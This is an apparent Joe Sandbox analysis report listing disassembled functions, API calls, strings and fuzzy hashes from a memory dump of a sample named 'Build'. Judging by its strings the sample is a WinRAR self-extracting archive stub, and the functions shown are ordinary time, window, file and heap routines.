Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: M8$csm
API String ID: 1170836740-1673394271
Opcode ID: 7d9fd565ba9621c04fdf840d514f82a4ac28d83604c6384cff214631d86425d7
Instruction ID: 7ff692daef0f1285f54de6092b3280e306bc36e9fcbafb1707324f8d614cb665
Opcode Fuzzy Hash: 7d9fd565ba9621c04fdf840d514f82a4ac28d83604c6384cff214631d86425d7
Instruction Fuzzy Hash: FD41E674A003199FCF12EF68C885A9EBBB5BF45314F1481D9F9149F752DB329A11CB90

Function 003732F8 Relevance: 12.1, APIs: 8, Instructions: 131timeCOMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 0037331D

Part of subcall function 0036D076: GetVersionExW.KERNEL32(?), ref: 0036D0A7

FileTimeToLocalFileTime.KERNEL32(000000FF,?,?,000000FF,00000064,00000000,?,00000000), ref: 00373340
FileTimeToSystemTime.KERNEL32(000000FF,?,?,000000FF,00000064,00000000,?,00000000), ref: 00373352
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00373363
SystemTimeToFileTime.KERNEL32(?,?), ref: 00373373
SystemTimeToFileTime.KERNEL32(?,?), ref: 00373383
FileTimeToSystemTime.KERNEL32(?,?,?), ref: 003733BE
__aullrem.LIBCMT ref: 00373464

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: a9bea617297660111dfab78ed2320d8afc9fe729b09ceb594ae256e6985ec81a
Instruction ID: 3c07111bbd7260a8baffe5ff9f605be60541ff2cb4742a0002c059c9b01249ce
Opcode Fuzzy Hash: a9bea617297660111dfab78ed2320d8afc9fe729b09ceb594ae256e6985ec81a
Instruction Fuzzy Hash: 0D5136B1508305AFC715DF65C88196BFBE9FF88714F00892EF59AC6210E739EA49CB52

Function 0037BC7E Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0037BC8A

Strings

<style>, xrefs: 0037BDB0
<br>, xrefs: 0037BD7E
</p>, xrefs: 0037BD68
</style>, xrefs: 0037BDD2
>, xrefs: 0037BCCB

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: _wcslen
String ID: </p>$</style>$<br>$<style>$>
API String ID: 176396367-3568243669
Opcode ID: 2b0c8e48f4733875438c3f125f9002b25d8f3f692f8feb61eaec99c01385b10a
Instruction ID: 7168230fbbe6b023bc10b5b3cc5842374ebd1be39e83584c877c1d1463741631
Opcode Fuzzy Hash: 2b0c8e48f4733875438c3f125f9002b25d8f3f692f8feb61eaec99c01385b10a
Instruction Fuzzy Hash: 32510A5664031796DB336E1958217B6E3F4DFA4790F6AC42AFDC8DB2C0FB5C8C418261

Function 0036ACE8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 149fileCOMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00000800), ref: 0036AD2B
GetShortPathNameW.KERNEL32(?,?,00000800), ref: 0036AD4A

Part of subcall function 0036E208: _wcslen.LIBCMT ref: 0036E210

Part of subcall function 00374168: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,0036E084,00000000,.exe,?,?,00000800,?,?,?,0037AD5D), ref: 0037417E

_swprintf.LIBCMT ref: 0036ADEC

Part of subcall function 00364C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00364C13

MoveFileW.KERNEL32(?,?), ref: 0036AE5E
MoveFileW.KERNEL32(?,?), ref: 0036AE9E

Strings

rtmp%d, xrefs: 0036ADD5

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: FileMoveNamePath$CompareLongShortString__vswprintf_c_l_swprintf_wcslen
String ID: rtmp%d
API String ID: 2133196417-3303766350
Opcode ID: c417ef4b435345af04c1d284aa021e92a22b0cd6386869bc189fd7394ec304c3
Instruction ID: def58d9974e5e4480444f144928152f3b0ebe624edd6c086484bf3b2bc3dd688
Opcode Fuzzy Hash: c417ef4b435345af04c1d284aa021e92a22b0cd6386869bc189fd7394ec304c3
Instruction Fuzzy Hash: 56519271900A186ACF22EBA0CC85EEF73BCBF45341F0488A9B556E7145EB359A84DF61

Function 0037BE55 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000), ref: 0037BE8A
GetWindowRect.USER32(?,?), ref: 0037BED1
ShowWindow.USER32(?,00000005,00000000), ref: 0037BF6C
SetWindowTextW.USER32(?,00000000), ref: 0037BF74
ShowWindow.USER32(00000000,00000005), ref: 0037BF8A

Strings

RarHtmlClassName, xrefs: 0037BF31

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: Window$Show$RectText
String ID: RarHtmlClassName
API String ID: 3937224194-1658105358
Opcode ID: 488c4ff051d089e58fdd1225ef810a4040813b68c5c19295774f25276ade7184
Instruction ID: 6a376ddfbc8b68ce2077a63270f6dca553348a7d14260f44bfca0c41f705de00
Opcode Fuzzy Hash: 488c4ff051d089e58fdd1225ef810a4040813b68c5c19295774f25276ade7184
Instruction Fuzzy Hash: 52415E72508300AFCB229F649C49B6BBBFCAB48751F1A8559FD49DA151DB34E800CFA1

Function 0037B8D5 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0037B8DE
_wcslen.LIBCMT ref: 0037B913

Strings

, xrefs: 0037B930
<br>, xrefs: 0037B95F
 , xrefs: 0037B9A1
<style>body{font-family:"Arial";font-size:12;}</style>, xrefs: 0037B907

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: _wcslen
String ID: $ $<br>$<style>body{font-family:"Arial";font-size:12;}</style>
API String ID: 176396367-3743748572
Opcode ID: f97f4931c1e2038bc32ffae84167b1c0757855a93300c0716654df2bcaa3a98c
Instruction ID: dd7303899e515cdb0bb5e1e0db1bacf35a195c72fb4c47e88aafc1eae2dd002b
Opcode Fuzzy Hash: f97f4931c1e2038bc32ffae84167b1c0757855a93300c0716654df2bcaa3a98c
Instruction Fuzzy Hash: B831422264430556D636BB549C42B77F3F4EB91310F51C42EF7A99B2C0FB59BC4443A1

Function 0038EEF4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0038EEB8: _free.LIBCMT ref: 0038EEE1

_free.LIBCMT ref: 0038EF42

Part of subcall function 0038BAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,0038EEE6,?,00000000,?,00000000,?,0038EF0D,?,00000007,?,?,0038F30A,?), ref: 0038BB10
Part of subcall function 0038BAFA: GetLastError.KERNEL32(?,?,0038EEE6,?,00000000,?,00000000,?,0038EF0D,?,00000007,?,?,0038F30A,?,?), ref: 0038BB22

_free.LIBCMT ref: 0038EF4D
_free.LIBCMT ref: 0038EF58
_free.LIBCMT ref: 0038EFAC
_free.LIBCMT ref: 0038EFB7
_free.LIBCMT ref: 0038EFC2
_free.LIBCMT ref: 0038EFCD

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: ed90a822092467ab948ce4ab8a4e5ff1fef504289117e408d2aed02f462530fb
Instruction ID: 93ae5ba0b3e3ebcf83bc64c075d14f0cc7b356cb19ba453e73d31b6bb35374cb
Opcode Fuzzy Hash: ed90a822092467ab948ce4ab8a4e5ff1fef504289117e408d2aed02f462530fb
Instruction Fuzzy Hash: EC112172941B05AAE522F7B1CC07FCBB7AC6F44700F404C55F29A7E292DB79B5054754

Function 00368C95 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 51COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000020,?), ref: 00368CB2
GetLastError.KERNEL32 ref: 00368CF6
CloseHandle.KERNEL32(?), ref: 00368D05

Strings

@8, xrefs: 00368CB9
J8, xrefs: 00368CEC
^8, xrefs: 00368CD7

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: CloseCurrentErrorHandleLastProcess
String ID: @8$J8$^8
API String ID: 1009092642-1335377171
Opcode ID: 24f35f343e44df23129054cc257c48705f08b571e9123adac1ec0bd924131d80
Instruction ID: d2bf5b8d7a1842da49529c7bcd7e2fa68571ff255240502bc65bbf2dda36a45a
Opcode Fuzzy Hash: 24f35f343e44df23129054cc257c48705f08b571e9123adac1ec0bd924131d80
Instruction Fuzzy Hash: C50100B0601219AFDB129FA5DC8AEFFBBBCEB19344F404419F901E2190DA319D45DB70

Function 00380ACB Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00380B46,00380AA9,00380D4A), ref: 00380AE2
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00380AF8
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00380B0D

Strings

AcquireSRWLockExclusive, xrefs: 00380AF2
ReleaseSRWLockExclusive, xrefs: 00380B02
KERNEL32.DLL, xrefs: 00380ADD

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 667068680-1718035505
Opcode ID: ad6363a5f88c5ceff05ca92b49bbb9c54def48a984b7fc01d3e427cce930162c
Instruction ID: 4e427cf1998d32546a9c6ab9cf74c707d21ef1df81c12a823393f5c21e830bdf
Opcode Fuzzy Hash: ad6363a5f88c5ceff05ca92b49bbb9c54def48a984b7fc01d3e427cce930162c
Instruction Fuzzy Hash: 7EF0C8317567215B4FBBBFB45C8A96B22CC9A8235533304BAD502D3240E691DCC9D3E0

Function 0037418A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00374192
_wcslen.LIBCMT ref: 003741A3
_wcslen.LIBCMT ref: 003741B3
_wcslen.LIBCMT ref: 003741C1
CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0036D2D3,?,?,00000000,?,?,?), ref: 003741DC

Strings

<, xrefs: 003741DC

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: _wcslen$CompareString
String ID: <
API String ID: 3397213944-4251816714
Opcode ID: 360752da15d7661dcbe3594c55a0692d9a7d9db0ad145c4c47b51e2192266fac
Instruction ID: ed5775490849edcc388a66d59875d15754382d63a31db9dea560eafd6c798f98
Opcode Fuzzy Hash: 360752da15d7661dcbe3594c55a0692d9a7d9db0ad145c4c47b51e2192266fac
Instruction Fuzzy Hash: DFF01D32148154BFCF232F51EC0AD8E3F26EB90770B91C455F6195F061CB32A59597D0

Function 0038B160 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0038B17E

Part of subcall function 0038BAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,0038EEE6,?,00000000,?,00000000,?,0038EF0D,?,00000007,?,?,0038F30A,?), ref: 0038BB10
Part of subcall function 0038BAFA: GetLastError.KERNEL32(?,?,0038EEE6,?,00000000,?,00000000,?,0038EF0D,?,00000007,?,?,0038F30A,?,?), ref: 0038BB22

_free.LIBCMT ref: 0038B190
_free.LIBCMT ref: 0038B1A3
_free.LIBCMT ref: 0038B1B4
_free.LIBCMT ref: 0038B1C5

Strings

p,:, xrefs: 0038B174

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: p,:
API String ID: 776569668-1418527582
Opcode ID: ca9ecfe2eb129e38c036fcccb47e98c5a43e144c1c8f418dae247d69d1f9b3c9
Instruction ID: 93f145af9edf9944378fa845535fe944f578e5b23b5f7ce10cace4b372b3b5f8
Opcode Fuzzy Hash: ca9ecfe2eb129e38c036fcccb47e98c5a43e144c1c8f418dae247d69d1f9b3c9
Instruction Fuzzy Hash: 60F0BD708107129BC647BB19EC02C89B769FB15725B01494AF4169A361CF7A58418F90

Function 00373583 Relevance: 9.1, APIs: 6, Instructions: 104timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 003735E6

Part of subcall function 0036D076: GetVersionExW.KERNEL32(?), ref: 0036D0A7

LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0037360A
FileTimeToSystemTime.KERNEL32(?,?), ref: 00373624
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00373637
SystemTimeToFileTime.KERNEL32(?,?), ref: 00373647
SystemTimeToFileTime.KERNEL32(?,?), ref: 00373657

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: ac0b4dd22e21bcd79be2bac3c9c512bb2aa1075d509081f79a2d3b4fa2926ed2
Instruction ID: 8c1bf464ba0faf564e78642e2bfb293422e552ee6943de7f5eacade4d7edaca0
Opcode Fuzzy Hash: ac0b4dd22e21bcd79be2bac3c9c512bb2aa1075d509081f79a2d3b4fa2926ed2
Instruction Fuzzy Hash: 9F4138761083059BCB05DFA8C88599BB7ECFF98704F04891EF999C7220E730D909CBA6

Function 0038511A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00385111,00384ECC,003821B4), ref: 00385128
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00385136
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0038514F
SetLastError.KERNEL32(00000000,00385111,00384ECC,003821B4), ref: 003851A1

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: dac8ffcc4f575c7bf17fb061da9d8db45e7d88be2609c43e37dd02dac11dd4f2
Instruction ID: 17757db1afe6b142ad823bae1f1d4829f1025d308035ab1e966846933e9486c7
Opcode Fuzzy Hash: dac8ffcc4f575c7bf17fb061da9d8db45e7d88be2609c43e37dd02dac11dd4f2
Instruction Fuzzy Hash: A201D436219B116EEA2737B8BC8B7372A5CEB02771FB113AAF110896E1EF524C509744

Function 0038B9A5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,003A50C4,00386E12,003A50C4,?,?,0038688D,?,?,003A50C4), ref: 0038B9A9
_free.LIBCMT ref: 0038B9DC
_free.LIBCMT ref: 0038BA04
SetLastError.KERNEL32(00000000,?,003A50C4), ref: 0038BA11
SetLastError.KERNEL32(00000000,?,003A50C4), ref: 0038BA1D
_abort.LIBCMT ref: 0038BA23

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 1522da3d324606cfb9f737eb31f980b46e1bd792926a7f5bce609f65aa3327f3
Instruction ID: 588cc631dbf3367daa175c70005b057d091b82a496fa368dee6995272d3a6af5
Opcode Fuzzy Hash: 1522da3d324606cfb9f737eb31f980b46e1bd792926a7f5bce609f65aa3327f3
Instruction Fuzzy Hash: 91F0C836105B0367C61B7339AC4BF6B662D9FC2770F250195FA16EA3D2EF668C058354

Function 0038004D Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,0000000A), ref: 00380059
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00380073
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00380084
TranslateMessage.USER32(?), ref: 0038008E
DispatchMessageW.USER32(?), ref: 00380098
WaitForSingleObject.KERNEL32(?,0000000A), ref: 003800A3

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: Message$ObjectSingleWait$DispatchPeekTranslate
String ID:
API String ID: 2148572870-0
Opcode ID: d59dbc2ac84977b30543834648a90e786ae4957745c80254eaf6790dac64ab45
Instruction ID: 4c8573645634d072c2272085af77c2c6d3c1e746fa4eafbdf7f5214ae7726fb9
Opcode Fuzzy Hash: d59dbc2ac84977b30543834648a90e786ae4957745c80254eaf6790dac64ab45
Instruction Fuzzy Hash: A9F0FF72A05229BBCB226BA5EC4DEDF7F6DEF42751F008011F94AD2050D675D546CBA0

Function 0037D41C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 149COMMON

Download Yara Rule

APIs

EndDialog.USER32(?,00000001), ref: 0037D57B
GetDlgItemTextW.USER32(?,00000066,00001000,00000200), ref: 0037D591
SetDlgItemTextW.USER32(?,00000067,?), ref: 0037D5B9

Strings

GETPASSWORD1, xrefs: 0037D548
Software\WinRAR SFX, xrefs: 0037D466

Memory Dump Source

